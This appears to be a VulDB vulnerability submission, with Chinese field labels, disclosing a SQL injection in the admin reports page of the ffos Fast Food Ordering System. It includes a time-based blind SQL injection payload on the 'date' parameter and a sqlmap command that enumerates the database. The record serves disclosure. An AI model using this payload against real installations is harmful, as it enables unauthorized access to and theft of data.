| 标题 | ffos SQL injection vulnerability exists |
|---|
| 描述 | ffos/admin/reports/index.php Line 64 of the invokes the SQL query built from the untrusted data source input. This call allows an attacker to modify the meaning of a statement or execute arbitrary SQL commands
payload:page=reports&date=2022-08-27' AND (SELECT 4661 FROM (SELECT(SLEEP(5)))zoQf) AND 'VZWY'='VZWY
Use sqlmap to verify
python .\sqlmap.py -u "http://localhost/ffos/admin/?page=reports&date=2022-08-27" --current-db --batch
|
|---|
| 来源 | ⚠️ https://github.com/0x14dli/ffos-SQL-injection-vulnerability-exists |
|---|
| 用户 | 0x14d (UID 31582) |
|---|
| 提交 | 2022-08-27 06時02分 (4 年前) |
|---|
| 管理 | 2022-08-27 10時38分 (5 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 207422 [oretnom23 Fast Food Ordering System index.php 日期 SQL注入] |
|---|
| 积分 | 20 |
|---|